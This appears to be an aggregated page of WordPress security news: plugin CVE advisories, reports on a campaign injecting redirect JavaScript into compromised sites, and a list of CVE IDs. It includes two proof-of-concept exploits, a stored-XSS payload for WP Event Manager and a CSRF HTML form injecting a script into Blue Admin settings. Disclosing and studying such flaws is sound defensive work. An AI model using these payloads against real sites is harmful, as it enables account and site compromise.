The ULeak Security & Monitoring WordPress plugin through 1.2.3 does not have authorisation and CSRF checks when updating its settings, and is also lacking sanitisation as well as escaping in some of them, which could allow any authenticated users such as subscriber to perform Stored Cross-Site Scripting attacks against admins viewing the settings

CVE-2022-1557

The th23 Social WordPress plugin through 1.2.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed

CVE-2022-1062

The AGIL WordPress plugin through 1.0 accepts all zip files and automatically extracts the zip file without validating the extracted file type. Allowing high privilege users such as admin to upload an arbitrary file like PHP, leading to RCE

CVE-2021-25119

WordPress WP Event Manager plugin version 3.1.27 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: WordPress Plugin WP Event Manager  - Stored Cross SiteScripting# Date: 15-05-2022# Exploit Author: Mariam Tariq - HunterSherlock# Vendor Homepage: https://wordpress.org/plugins/wp-event-manager/# Version: 3.1.27# Tested on: Firefox# Contact me: mariamtariq404@gmail.com#Steps To Reproduce :1 - First Install the plugins - wp-event-manager and activate it.2 - Go to event manager —> Add New3 - Inside the “”Event Title” at the top, enter XSS payload “><img src=xonerror=alert(1)> and hit publish.4 - Check the newly made event’s URL /event/{id}/ , XSS will trigger.#Poc Image :https://imgur.com/J1Q3x5u

WordPress WP Event Manager 3.1.27 Cross Site Scripting

Threat actors have launched a new campaign that starts with compromised WordPress sites and leads to fake reCAPTCHA sites designed to get visitors to accept web push notifications.
The post Fake reCAPTCHA forms dupe users via compromised WordPress sites appeared first on Malwarebytes Labs.

Researchers at Sucuri investigated a number of WordPress websites complaining about unwanted redirects and found websites that use fake CAPTCHA forms to get the visitor to accept web push notifications.

These websites are a new wave of a campaign that leverages many compromised WordPress sites.

**CAPTCHA**

CAPTCHA (“Completely Automated Public Turing test to tell Computers and Humans Apart”) is one of the annoyances that we have learned to take for granted when we browse the Internet. Scientists developed CAPTCHA as a method to tell humans and bots apart so as to to keep bots from accessing sites or systems where they are not welcome.

Google bought and owns reCAPTCHA, which represents a CAPTCHA system expressly developed to reduce the needed amount of user interaction. The original version asked users to decipher hard to read text or match images. Version 2 required users to decipher text or match images if the analysis of cookies and canvas rendering suggested an automatic download of the page. Since version 3, reCAPTCHA doesn’t interrupt users, running automatically when users load pages or click buttons.

The basic version of a real reCAPTCHA the threat actors used as a template to create the fake ones looks like this:

_legitimate reCAPTCHA_

**The campaign**

The fake CAPTCHA sites are part of a long lasting campaign responsible for injecting malicious scripts into compromised WordPress websites. This campaign leverages known vulnerabilities in WordPress themes and plugins and has impacted an enormous number of websites over the years.

The compromised websites all share a common issue. The threat actors injected malicious JavaScript within the affected website’s files and database. Attackers attempted to automatically infect any .js file with jQuery in the name, on a compromised website. They then injected obfuscated code when successful. This malicious JavaScript was appended under the current script or under the head of the page where it was fired on every page load, redirecting site visitors to the destination chosen by the threat actor.

The Malwarebytes Threat Intelligence Team tracked a rogue affiliate’s traffic which flowed through the same **local\[.\]drakefollow\[.\]com** subdomain that was mentioned in the Sucuri blog. The threat actor chose to promote a legitimate security product in this case, but might as well have led visitors to potentially unwanted programs (PUPs), adware, or tech support scams.

_Traffic flow from compromised WordPress site to rogue affilate’s site_

**The fake CAPTCHA**

At this point in the chain of redirections, the fake reCAPTCHA websites kick in. The fake reCAPTCHA sites are the final step towards duping the visitor. The unsuspecting visitor will land on a site that tries to trick them into accepting push notifications from the landing page’s domain.

_fake reCAPTCHA_

Visitors think they need to click “Allow” to get past the CAPTCHA screen, when in fact they are giving permission to the domain to send them push notifications.

By design, push notifications work similarly across different operating systems and web browsers. They appear outside of the browser window just above the taskbar on the right hand side. This is misleading as they may seem to originate from the operating system. Knowing the difference between a web push notification and an alert that comes from the operating system or another program installed on the device is hard, and that makes it difficult for the unsuspecting user of an affected system to know what is going on.

As we reported in the past, adware, search hijackers, and PUP families have added push notifications as one of their attack vectors. Sucuri warns that it is also one of the most common ways attackers display “tech support” scams, where users are told their computer is infected or slow and they should call a toll-free number to fix the problem.

**Removal and mitigation**

Knowing that these fake reCAPTCHA sites exist and being able to spot the difference with a real one is your best protection. Also, many security programs, including Malwarebytes, will block access to the campaign’s domains.

If your system shows you push notifications, you can find detailed instructions on how to disable and remove permissions for browser push notifications in our article: Browser push notifications: a feature asking to be abused.

Website owners can use Sucuri’s free remote website scanner to detect the malware.

Stay safe, everyone!

_Special thanks to the Malwarebytes Threat Intelligence Tea_m _for their contribution and the screenshot_

Fake reCAPTCHA forms dupe users via compromised WordPress sites

Authenticated (contributor or higher role) Cross-Site Scripting (XSS) vulnerability in Donations plugin <= 1.8 on WordPress.

*   Details
*   Reviews
*   Support
*   Development

This plugin has been closed as of February 28, 2022 and is not available for download. Reason: Security Issue.

There is no way to edit the 'insert custom value' in the form page. it gets confusing for site visitor as an 'insert amount' would be certainly clearer. All in all, a very good plugin

Failed FAQ, no any reply to the question u asked

Hello this is great. LARGE DAMAGE: PAYMENT "STRIPE" NOT CONSIDERED. ONLY PAYPAL

Read all 8 reviews

“Donations” is open source software. The following people have contributed to this plugin.

Contributors

*    nicdark

CVE-2022-29433: Donations

resi-calltrace in RESI Gemini-Net 4.2 is affected by OS Command Injection. It does not properly check the parameters sent as input before they are processed on the server. Due to the lack of validation of user input, an unauthenticated attacker can bypass the syntax intended by the software (e.g., concatenate `&|;\r\ commands) and inject arbitrary system commands with the privileges of the application user.

**Finalità e modalità operative**

**CVE-2022-29539 – RESI S.p.A**

**CVE-2022-29538 – RESI S.p.A**

**CVE-2022-28862 – ARCHIBUS Web Central**

**CVE-2022-27880 – F5 Traffix Signal Delivery Controller**

**CVE-2022-27662 – F5 Traffix Signal Delivery Controller**

**CVE-2022-26484 – Veritas Operations Manager**

**CVE-2022-26483 – Veritas Operations Manager**

**CVE-2022-25344 – Olivetti d-COLOR MF3555**

**CVE-2022-25343 – Olivetti d-COLOR MF3555**

**CVE-2022-25342 – Olivetti d-COLOR MF3555**

**CVE-2021-41555 – ARCHIBUS Web Central**

**CVE-2021-41554 – ARCHIBUS Web Central**

**CVE-2021-41553 – ARCHIBUS Web Central**

**CVE-2021-38123 – Micro Focus Network Automation**

**CVE-2021-35492 – Wowza Streaming Engine**

**CVE-2021-35491 – Wowza Streaming Engine**

**CVE-2021-35490 – Thruk**

**CVE-2021-35489 – Thruk**

**CVE-2021-35488 – Thruk**

**CVE-2021-32571 – Ericsson OSS-RC**

**CVE-2021-32569 – Ericsson OSS-RC**

**CVE-2021-31540 - WOWZA Streaming Engine**

**CVE-2021-31539 - WOWZA Streaming Engine**

**CVE-2021-29661 – Softing AG OPC Toolbox**

**CVE-2021-29660 – Softing AG OPC Toolbox**

**CVE-2021-28979 - Thales SafeNet KeySecure Management Console**

**CVE-2021-28488 – Ericsson Network Manager**

**CVE-2021-28250 – CA eHealth Performance Manager**

**CVE-2021-28249 – CA eHealth Performance Manager**

**CVE-2021-28248 – CA eHealth Performance Manager**

**CVE-2021-28247 – CA eHealth Performance Manager**

**CVE-2021-28246 – CA eHealth Performance Manager**

**CVE-2021-26597 – NOKIA NetAct**

**CVE-2021-26596 – NOKIA NetAct**

**CVE-2021-3314 - Oracle GlassFish Server**

**CVE-2021-2005 – ORACLE Business Intelligence Enterprise Edition of Oracle Fusion Middleware**

**CVE-2020-35590 – WordPress Plugin Limit Login Attempts Reloaded**

**CVE-2020-35589 – WordPress Plugin Limit Login Attempts Reloaded**

**CVE-2020-28209 – Schneider Electric StruxureWare Building Operation Enterprise Server Installer – Enterprise Central Installer**

**CVE-2020-27583 – IBM InfoSphere Information Server**

**CVE-2020-17458 – MultiUX**

**CVE-2020-17457 – Fujitsu ServerView Suite iRMC**

**CVE-2020-15794 – Siemens Desigo Insight**

**CVE-2020-15793 – Siemens Desigo Insight**

**CVE-2020-15792 – Siemens Desigo Insight**

**CVE-2020-14843 – ORACLE Business Intelligence Enterprise Edition of Oracle Fusion Middleware**

**CVE-2020-14842 – ORACLE Business Intelligence Enterprise Edition of Oracle Fusion Middleware**

**CVE-2020-14690 – ORACLE Business Intelligence Enterprise Edition of Oracle Fusion Middleware**

**CVE-2020-12081 – FlexNet Publisher**

**CVE-2020-9050 – Johnson Controls Metasys MREWeb Service**

**CVE-2020-7573 – Schneider Electric StruxureWare Building Operation WebReports**

**CVE-2020-7572 – Schneider Electric StruxureWare Building Operation WebReports**

**CVE-2020-7571 – Schneider Electric StruxureWare Building Operation WebReports**

**CVE-2020-7570 – Schneider Electric StruxureWare Building Operation WebReports**

**CVE-2020-7569 – Schneider Electric StruxureWare Building Operation WebReports**

**CVE-2020-2505 – QNAP QES**

**CVE-2020-2504 – QNAP QES**

**CVE-2020-2503 – QNAP QES**

**CVE-2019-19994 - Selesta Visual Access Manager**

**CVE-2019-19993 - Selesta Visual Access Manager**

**CVE-2019-19992 - Selesta Visual Access Manager**

**CVE-2019-19991 - Selesta Visual Access Manager**

**CVE-2019-19990 - Selesta Visual Access Manager**

**CVE-2019-19989 - Selesta Visual Access Manager**

**CVE-2019-19988 – Selesta Visual Access Manager**

**CVE-2019-19987 - Selesta Visual Access Manager**

**CVE-2019-19986 - Selesta Visual Access Manager**

**CVE-2019-19456 - WOWZA Streaming Engine**

**CVE-2019-19455 - WOWZA Streaming Engine**

**CVE-2019-19454 - WOWZA Streaming Engine**

**CVE-2019-19453 - WOWZA Streaming Engine**

**CVE-2019-17406 - NOKIA IMPACT**

**CVE-2019-17405 - NOKIA IMPACT**

**CVE-2019-17404 - NOKIA IMPACT**

**CVE-2019-17403 - NOKIA IMPACT**

CVE-2022-29539: Vulnerability Research & Advisor

Cybersecurity researchers have disclosed a massive campaign that's responsible for injecting malicious JavaScript code into compromised WordPress websites that redirects visitors to scam pages and other malicious websites to generate illegitimate traffic.
"The websites all shared a common issue — malicious JavaScript had been injected within their website's files and the database, including

Cybersecurity researchers have disclosed a massive campaign that's responsible for injecting malicious JavaScript code into compromised WordPress websites that redirects visitors to scam pages and other malicious websites to generate illegitimate traffic.

"The websites all shared a common issue — malicious JavaScript had been injected within their website's files and the database, including legitimate core WordPress files," Krasimir Konov, a malware analyst at Sucuri, said in a report published Wednesday.

This involved infecting files such as jquery.min.js and jquery-migrate.min.js with obfuscated JavaScript that's activated on every page load, allowing the attacker to redirect the website visitors to a destination of their choice.

The GoDaddy-owned website security company said that the domains at the end of the redirect chain could be used to load advertisements, phishing pages, malware, or even trigger another set of redirects.

In some instances, unsuspecting users are taken to a rogue redirect landing page containing a fake CAPTCHA check, clicking which serves unwanted ads that are disguised to look as if they come from the operating system and not from a web browser.

The campaign — a continuation of another wave that was detected last month — is believed to have impacted 322 websites so far, starting May 9. The April set of attacks, on the other hand, has breached over 6,500 websites.

"It has been found that attackers are targeting multiple vulnerabilities in WordPress plugins and themes to compromise the website and inject their malicious scripts," Konov said.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Thousands of WordPress Sites Hacked to Redirect Visitors to Scam Sites

WordPress Blue Admin plugin version 21.06.01 suffers from a cross site request forgery vulnerability.

    Exploit Title: WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF)Date: 2021-07-27Exploit Author : Abisheik M Vendor Homepage : https://wpscan.com/plugin/blue-admiVersion : <= 21.06.01Tested on: windows 10 ProfessionalCVE : CVE-2021-24581<html>  <body>    <form action="http://example.com/wp-admin/admin.php?page=blue-admin&tab=blue_admin_login_page" method="POST" enctype="multipart/form-data">      <input type="hidden" name="ba_lp_attr[fm_bg_color]" value="FFFFFF" />      <input type="hidden" name="ba_lp_attr[fm_color]" value="777777" />      <input type="hidden" name="ba_lp_attr[logo_text]" value='WP"><script>alert(/XSS/)</script>' />      <input type="hidden" name="ba_lp_attr[logo_url]" value="https://example.com" />      <input type="hidden" name="ba_lp_attr[logo_img]" value="" />      <input type="hidden" name="ba_lp_attr[bg_color]" value="EEEEEE" />      <input type="hidden" name="ba_lp_attr[text_color]" value="222222" />      <input type="hidden" name="ba_lp_attr[bg_img]" value="" />      <input type="hidden" name="ba_lp_attr[bg_img_pos]" value="" />      <input type="hidden" name="ba_lp_attr[bg_img_rep]" value="" />      <input type="hidden" name="ba_lp_options_save" value="Save changes" />      <input type="submit" value="Submit request" />    </form>  </body></html>

Tag

#wordpress